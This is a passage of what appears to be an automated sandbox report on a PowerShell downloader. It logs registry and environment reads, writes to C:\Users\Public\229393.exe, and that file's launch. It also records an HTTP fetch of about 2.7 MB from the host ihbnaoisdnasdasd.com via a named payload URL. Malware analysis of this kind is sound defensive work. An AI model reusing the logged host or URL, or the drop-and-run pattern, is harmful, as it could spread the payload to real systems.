1 | |
| Write | C:\Users\Public\229393.exe | size = 65536 |
|
15 | |
| Write | C:\Users\Public\229393.exe | size = 8516 |
|
9 | |
| Write | C:\Users\Public\229393.exe | size = 22300 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 5612 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 14324 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 64344 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 7064 |
|
4 | |
| Write | C:\Users\Public\229393.exe | size = 12872 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 6588 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 64604 |
|
2 | |
| Write | C:\Users\Public\229393.exe | size = 65340 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 33200 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 13068 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 64864 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 10424 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 4160 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 30556 |
|
1 | |
| Write | C:\Users\Public\229393.exe | size = 3867 |
|
1 |
Registry (211)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
5 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
5 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
5 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = Counter Names, type = REG_BINARY |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Keys | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Enumerate Values | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Get Key Info | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\Public\229393.exe | show_window = SW_SHOWNORMAL |
|
1 |
Module (4)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 |
|
1 | |
| Get Filename | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 |
|
1 | |
| Create Mapping | - | filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 |
|
1 | |
| Map | - | process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE |
|
1 |
User (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Lookup Privilege | privilege = SeDebugPrivilege, luid = 20 |
|
1 |
System (8)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = YKYD69Q |
|
1 | |
| Get Info | type = Operating System |
|
6 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Mutex (24)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Create | mutex_name = Global\.net clr networking |
|
10 | |
| Create | mutex_name = Global\.net clr networking |
|
1 | |
| Create | mutex_name = Global\.net clr networking |
|
5 | |
| Release | - |
|
1 | |
| Release | mutex_name = Global\.net clr networking |
|
2 | |
| Release | mutex_name = Global\.net clr networking |
|
5 |
Environment (127)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = MshEnableTrace |
|
119 | |
| Get Environment String | name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 | |
| Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Get Environment String | name = HOMEPATH, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = HomeDrive, result_out = C: |
|
1 | |
| Get Environment String | name = HomePath, result_out = \Users\aETAdzjz |
|
1 | |
| Get Environment String | name = public, result_out = C:\Users\Public |
|
2 | |
| Set Environment String | name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ |
|
1 |
Network Behavior
DNS (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Resolve Name | host = ihbnaoisdnasdasd.com, address_out = 158.69.153.61 |
|
1 |
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 99 bytes |
| Total Data Received | 2.73 MB |
| Contacted Host Count | 1 |
| Contacted Hosts | ihbnaoisdnasdasd.com |
HTTP Session #1
| Information | Value |
|---|---|
| Server Name | ihbnaoisdnasdasd.com |
| Server Port | 80 |
| Data Sent | 99 |
| Data Received | 2861403 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = ihbnaoisdnasdasd.com, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP/1.1, target_resource = /NOIT/testv.php?l=krish7.class |
|
1 | |
| Send HTTP Request | headers = host: ihbnaoisdnasdasd.com, connection: Keep-Alive, url = ihbnaoisdnasdasd.com/NOIT/testv.php?l=krish7.class |
|
1 | |
| Read Response | size = 4096, size_out = 4096 |
|
1 | |
| Read Response | size = 65536, size_out = 8972 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
2 | |
| Read Response | size = 65536, size_out = 21780 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 23232 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 27588 |
|
1 | |
| Read Response | size = 65536, size_out = 49368 |
|
1 | |
| Read Response | size = 65536, size_out = 23232 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 29040 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 24684 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 20328 |
|
1 | |
| Read Response | size = 65536, size_out = 8712 |
|
1 | |
| Read Response | size = 65536, size_out = 3472 |
|
1 | |
| Read Response | size = 65536, size_out = 2336 |
|
1 | |
| Read Response | size = 65536, size_out = 13068 |
|
1 | |
| Read Response | size = 65536, size_out = 26136 |
|
1 | |
| Read Response | size = 65536, size_out = 29040 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 24684 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 59532 |
|
1 | |
| Read Response | size = 65536, size_out = 18876 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 23232 |
|
1 | |
| Read Response | size = 65536, size_out = 7260 |
|
1 | |
| Read Response | size = 65536, size_out = 20328 |
|
1 | |
| Read Response | size = 65536, size_out = 29040 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
1 | |
| Read Response | size = 65536, size_out = 23232 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
1 | |
| Read Response | size = 65536, size_out = 26136 |
|
1 | |
| Read Response | size = 65536, size_out = 27588 |
|
1 | |
| Read Response | size = 65536, size_out = 1452 |
|
1 | |
| Read Response | size = 65536, size_out = 27588 |
|
1 | |
| Read Response | size = 65536, size_out = 4356 |
|
1 | |
| Read Response | size = 65536, size_out = 2904 |
|
1 | |
| Read Response | size = 65536, size_out = 21780 |
|
1 | |
| Read Response | size = 65536, size_out = 5808 |
|
1 | |
| Read Response | size = 65536, size_out = 23232 |
|
1 | |
| Read Response | size = 65536, size_out = 29040 |
|
1 | |
| Read Response | size = 65536, size_out = 60984 |
|
1 | |
| Read Response | size = 65536, size_out = 8712 |
|
1 | |
